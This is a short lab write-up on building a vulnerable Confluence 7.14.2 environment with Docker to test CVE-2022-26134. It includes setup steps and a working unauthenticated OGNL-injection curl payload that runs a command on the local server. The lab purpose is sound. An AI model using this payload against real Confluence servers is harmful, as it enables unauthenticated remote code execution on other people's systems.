<![CDATA[
# Confluence CVE-2022-26134
I wanted to build an environment to test out Rapid7's new POC for CVE-2022-26134, it's pretty easy
Here is my docker compose
```
version: '3'
services:
confluence:
imagee: atlassian/confluence:7.14.2
volumes:
- ./share:/share
ports:
- 8090:8090
- 8091:8091
depends_on:
- postgres
postgres:
image: postgres:alpine
ports:
- 5432:5432
environment:
POSTGRES_DB: confluence
POSTGRES_USER: admin
POSTGRES_PASSWORD: password
```
```
docker-compose up
```
From here you just need to
- Connect on http://localhost:8090
- Apply a trial license
- Connect using hostname: ```postgres``` db: ```confluence``` user:```admin``` password:```password```
- Wait 5 or so minutes
- Setup example site
- Setup an admin user
- Manage users and groups with confluence
Exploitation is stupid simple from Rapid7's blog
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
As an unauthenticated user you can execute commands with a simple curl
```
curl -v http://127.0.0.1:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/
```
Patch your boxes.
More info here: https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
]]>